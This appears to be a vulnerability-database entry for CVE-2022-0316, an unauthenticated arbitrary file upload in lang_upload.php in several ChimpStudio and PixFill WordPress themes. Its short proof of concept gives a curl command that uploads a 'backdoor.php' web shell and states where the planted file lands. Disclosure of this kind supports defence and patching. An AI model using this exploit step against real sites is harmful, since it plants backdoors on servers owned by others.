Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitJoshua SmallWPEX-ID:9AB3D6CF-AAD7-41BC-9AAE-DC5313F12F7C
HistoryDec 29, 2022 - 12:00 a.m.

Multiple themes - Unauthenticated Arbitrary File Upload

2022-12-2900:00:00
Joshua Small
88
malicious file creation
file upload exploit
unauthenticated access

EPSS

0.004

Percentile

73.1%

JSON

Multiple themes from ChimpStudio and PixFill does not have any authorisation and upload validation in the lang_upload.php file, allowing any unauthenticated attacker to upload arbitrary files to the web server.

Create a malicious file "backdoor.php", then curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F "mofile[][email protected]"

The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php

Related

wpvulndb 1
prion 1
cve 1
cvelist 1
githubexploit 3
nvd 1
wpvulndb
wpvulndb
Multiple themes - Unauthenticated Arbitrary File Upload
2022-12-29 00:00:00
prion
prion
Design/Logic Flaw
2023-01-23 15:15:00
cve
cve
CVE-2022-0316
2023-01-23 15:15:13
cvelist
cvelist
CVE-2022-0316 Multiple themes - Unauthenticated Arbitrary File Upload
2023-01-23 14:48:05
githubexploit
githubexploit
Exploit for CVE-2022-0316
2023-02-08 17:37:09
Exploit for CVE-2024-43160
2024-09-17 04:19:54
Exploit for CVE-2024-5084
2024-05-25 03:49:04
nvd
nvd
CVE-2022-0316
2023-01-23 15:15:13

EPSS

0.004

Percentile

73.1%

JSON
Related for WPEX-ID:9AB3D6CF-AAD7-41BC-9AAE-DC5313F12F7C
wpvulndb1prion1cve1cvelist1githubexploit3nvd1